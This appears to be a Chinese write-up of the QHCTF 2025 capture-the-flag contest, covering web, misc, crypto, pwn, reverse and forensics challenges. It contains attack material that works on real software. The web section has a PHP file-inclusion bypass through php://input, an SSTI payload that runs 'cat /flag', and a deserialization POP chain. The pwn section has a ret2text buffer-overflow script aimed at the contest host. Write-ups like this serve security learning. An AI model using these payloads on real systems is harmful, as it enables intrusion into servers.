web

Easy_include

<?php
// Challenge source for "Easy_include": includes whatever path the `file`
// query parameter names, unless that value contains the word "flag".
// Turns off all error reporting, which also hides the notice/warning raised
// on the $_GET read below when `file` is absent from the query string.
error_reporting(0);
//flag in flag.php
// Untrusted input: copied straight from the query string with no normalisation.
$file=$_GET['file'];
if(isset($file))
{
// Deny-list check only: rejects values containing "flag" (case-insensitive).
// It neither confines the path to a directory nor limits stream wrappers,
// so on its own it is not a sufficient guard for include().
if(!preg_match("/flag/i",$file))
{
// NOTE(review): include() on request data is a file-inclusion sink. A safe
// version maps the parameter onto a fixed allow-list of files and keeps
// allow_url_include disabled.
include($file);
}
else
{
echo("no no no ~ ");
}
}
else
{
// No parameter supplied: print this file's own source.
highlight_file(__FILE__);
}

?>

代码审计:过滤只检查参数中是否含有flag,因此可以直接使用php://input伪协议,并把请求改为POST包

image-20250125100721650

Web_IP

在hint页面发现提示

image-20250125100059996

因此尝试在flag页面伪造本地IP

image-20250125100157940

发现没有结果,于是尝试测试是否存在SSTI(服务端模板注入)漏洞

image-20250125100339260

发现可以注入,直接尝试{system('cat /flag')},结果直接获得flag

image-20250125100520369

Web_pop

反序列化

<?php
/**
 * Property-only declaration used to build the serialized object graph.
 *
 * NOTE(review): presumably mirrors a class of the same name in the challenge
 * code, which is not shown on this page. The properties stay untyped so that
 * unset ones serialize as N (null).
 */
class Start
{
    public $name;
    public $func;
}

/**
 * Property-only declaration used to build the serialized object graph.
 *
 * NOTE(review): presumably mirrors a class of the same name in the challenge
 * code, which is not shown on this page.
 */
class Sec
{
    public $obj;
    public $var;
}

/**
 * Property-only declaration used to build the serialized object graph.
 *
 * NOTE(review): presumably mirrors a class of the same name in the challenge
 * code, which is not shown on this page.
 */
class Easy
{
    public $cla;
}

/**
 * Property-only declaration used to build the serialized object graph.
 *
 * NOTE(review): presumably mirrors a class of the same name in the challenge
 * code, which is not shown on this page.
 */
class eeee
{
    public $obj;
}
// Build the object graph and print its serialized form.
// NOTE(review): the challenge's own class definitions are not shown on this
// page, so which methods each link reaches on the target cannot be confirmed
// here. A chain like this only matters when an application feeds request data
// to unserialize(); decoding with json_decode(), or calling unserialize() with
// the allowed_classes option restricted, removes that sink.
$entry = new Start();
$outerSec = new Sec();
$easy = new Easy();
$shared = new eeee();
$innerStart = new Start();
$innerSec = new Sec();

// Wire the links from the innermost object outwards.
$innerStart->func = $innerSec;
$shared->obj = $innerStart;

// The same eeee instance is referenced from Easy::$cla and from Sec::$var,
// which is why the output below ends that branch with the back-reference r:4.
$easy->cla = $shared;
$outerSec->obj = $easy;
$outerSec->var = $shared;

$entry->name = $outerSec;

echo serialize($entry);
// Output:
//O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:4:"func";O:3:"Sec":2:{s:3:"obj";N;s:3:"var";N;}}}}s:3:"var";r:4;}s:4:"func";N;}

image-20250125151503417

misc

QHCTF For Year 2025

起初没有思路,但注意到数字长短不一后,尝试在日历上找到对应的数字并连接起来,即为flag

image-20250125101237578

PvzHE

发现各文件的修改日期不同,于是查看每个文件夹中修改日期较近的文件,找到flag

image-20250125121802539

image-20250125121751775

请找出拍摄地所在位置

直接根据广告牌上网搜

flag:QHCTF{广西壮族自治区柳州市柳城县六广路与榕泉路交叉口}

crypto

Easy_RSA

直接写解密脚本

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# RSA private key given by the challenge, in PEM "RSA PRIVATE KEY" form.
# Only the private key is defined here; no separate public key is needed
# for decryption.
# NOTE(review): embedding a private key in source is acceptable only for a
# throwaway challenge key like this one.
private_key = b'''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCmAm1LDBO/9naD21Cv+2IAIM45QFKUtMEmHE5urTxVFR+7wT6i
t8UycoEV+2h9n4uSLRwR9XgG78KefyzNQNJD2sCO6CxkXlnkONLQYtU1AUB8bqSQ
qvT+ifVz3JhYPDo1co8ZXYJn69/UidN+7IblB07vPuZS9QncD/o4RvhU4wIDAQAB
AoGAFpS87hjh9NofC9eAtbdhgLf1pTb5JK4jmb3+8zIQQ1iAvQbPsM2DftWxdl6A
u5nAn+0P5Od5YKQrWmjdHLxE/WpkL3yPqBkdK36yW5COL+QB2iEJ2pngKupouXcD
DQ7rE7h0tLl76hdDhM1+1JbI1ffldokL4BJTB6c7TpPR3MkCQQC3baP4h7M+zoxB
dZHQ8Q4+0BsvYFviFmEpaG4WVUmXKg5VqfFUyrQFje4I2+3sbx9EgHhSKXBxtDJP
ihpIdRGLAkEA57CKG9l0jP4Q4WoEHk+2pEsSfkIbFyjTfhx7tZ6td2nC0SBzzJC3
hv1l4PcMDO5/oHLCCNNsqoCGNOM4rukFCQJBAJQw1R9N6sdcMb4U0SiAB6VBliTx
cWo38Gl2wDH0145z4L7enGWHmmc+Ykfv/slcgWNjc1HVvs1t6pOOHGvbgL8CQEgr
J3nxTGq2oQ919H50mhGnCMWnVcTrBKXdvXMfUC1IFlUJ5Mgts90qhVeD3I8So1KZ
LHOPV+PsUOGcfYWOM/ECQE57g32MZRhCNcaiTJG2qDX20fkJkAfvDTGMP2K14Sx0
iqDIvd4z4gJDq448arl1V0qgFFuu0uODYThZNVYw2Sk=
-----END RSA PRIVATE KEY-----'''

# Ciphertext to recover; it is Base64 text (decrypt_message decodes it).
encrypted_message = "GAR7osCii7r02QmOzsvRs1vf/5Z0Eb/U7gBya2T0koE48uTPy6yMxOoYOIlkT1tAs3IPdhQaV0dsJ0TkYP5ZcDXE0/bxZbsj2sB9pINaRtS3oeKIG4Tr9yJ353UnBZVrsy+Urb6OqKeR6t/PgxbW8yiunAdAOOwEKPtTZCIXeBM="

def decrypt_message(encrypted_message, private_key):
    """Decrypt a Base64-encoded RSA-OAEP ciphertext and return it as text.

    Args:
        encrypted_message: Base64 text of the ciphertext.
        private_key: RSA private key in a form RSA.import_key accepts.

    Returns:
        The recovered plaintext, decoded as UTF-8.
    """
    # Load the key first, then wrap it in an OAEP cipher object.
    oaep = PKCS1_OAEP.new(RSA.import_key(private_key))

    # Undo the Base64 transport encoding before decrypting.
    ciphertext = base64.b64decode(encrypted_message)
    plaintext = oaep.decrypt(ciphertext)
    return plaintext.decode('utf-8')

# Run the decryption and report either the plaintext or the failure reason.
try:
    decrypted = decrypt_message(encrypted_message, private_key)
    # One print call, two lines of output: the label, then the plaintext.
    print("解密后的消息:", decrypted, sep="\n")
except Exception as err:
    print("解密失败:", err)

image-20250125153733577

pwn

Easy_pwn

有后门函数,明显栈溢出漏洞,ret2text思路直接做

from pwn import *
# Describe the target to pwntools: 64-bit x86 on Linux.
context(arch='amd64', os='Linux')

# io = process("./pwn")   # local run, kept disabled as in the original
elf = ELF("./pwn")
io = remote('challenge.qihangcup.cn', 35149)

# Address of a bare `ret` instruction in the binary.
# NOTE(review): presumably placed before the final address to keep the stack
# 16-byte aligned; confirm against the binary.
ret = 0x401016

# Address of the binary's `secret` function, resolved from the ELF symbols.
secret_addr = elf.sym['secret']

# Layout: 0x50 filler bytes, 8 zero bytes, the `ret` address, then `secret`.
# NOTE(review): presumably the filler covers the buffer and the zero quadword
# lands on the saved frame pointer; the binary itself is not shown on this page.
# The write-up attributes this to an unchecked stack buffer; bounded reads plus
# stack canaries and PIE are the usual hardening against it.
payload = b''.join([b'a' * 0x50, p64(0), p64(ret), p64(secret_addr)])

io.sendline(payload)

io.interactive()

Re

Checker

简单的xor

#include <iostream>
#include <vector>
using namespace std;

int main() {
    // Encrypted bytes (43 of them) taken from the challenge.
    const unsigned char enc[43] = {
        0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46, 0x15, 0x40, 0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46,
        0x14, 0x45, 0x16, 0x0E, 0x17, 0x45, 0x42, 0x41, 0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E, 0x46, 0x42,
        0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15, 0x42, 0x16, 0x5E
    };

    // Single-byte key; XOR is its own inverse, so applying it again decodes.
    const int key = 0x23;

    // Walk the array by pointer and print each decoded byte as a character.
    const unsigned char *const last = enc + sizeof(enc);
    for (const unsigned char *cursor = enc; cursor != last; ++cursor) {
        const int plain = *cursor ^ key;
        cout << static_cast<char>(plain);
    }

    cout << endl;

    return 0;
}

rainbow

给了一个XOR加密的密文。密文是十六进制字符串,每两个字符表示一个字节。

尝试写脚本爆破密钥,最后爆出密钥为0x5A

# Ciphertext from the challenge as hex text: two characters per byte.
encrypted_flag_hex = (
    "0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F3B6E69623B6D393F6D6227"
)

# Raw ciphertext bytes that the XOR loop works on.
encrypted_flag = bytes.fromhex(encrypted_flag_hex)

def xor_decrypt(data, key):
    """XOR every byte of `data` with `key` and return the result as a string.

    Args:
        data: iterable of integer byte values (for example a bytes object).
        key: integer XORed into each byte.

    Returns:
        A str holding one character per input byte.
    """
    chars = []
    for byte in data:
        chars.append(chr(byte ^ key))
    return ''.join(chars)

# Try every possible single-byte key (0x00-0xFF) and print each candidate.
# A one-byte key gives only 256 possibilities, so the readable row is picked
# out by eye; most rows contain non-printable characters.
candidates = ((k, xor_decrypt(encrypted_flag, k)) for k in range(0x100))
for key, decrypted in candidates:
    print(f"Key: {key:02X}, Decrypted: {decrypted}")

Forensics

Win_01

在黑客文件夹下找到被插入开始菜单的Server2.exe文件,将其放进奇安信沙盒中分析,发现IP及端口

image-20250126001238069

image-20250125234845397

对所得结果计算MD5哈希值(MD5是哈希算法,并非加密),获得flag:QHCTF{ad4fdee2eada36ec3c20e9d6311cf258}

Win_02

先找到user文件夹,找到下列的HackY$,这就是用户名,密码在远程连接中可以找到,为123456,连起来为HackY$_123456

flag为QHCTF{fb484ad326c0f3a4970d1352bfbafef8}

Win_07

先提取一个flag.zip的文件,但是发现要密码,并且提示在环境变量中

image-20250126002231636

直接在user用户找环境变量中密码

image-20250126002901524

打开文件解压后base64解码获得flag

image-20250126003020776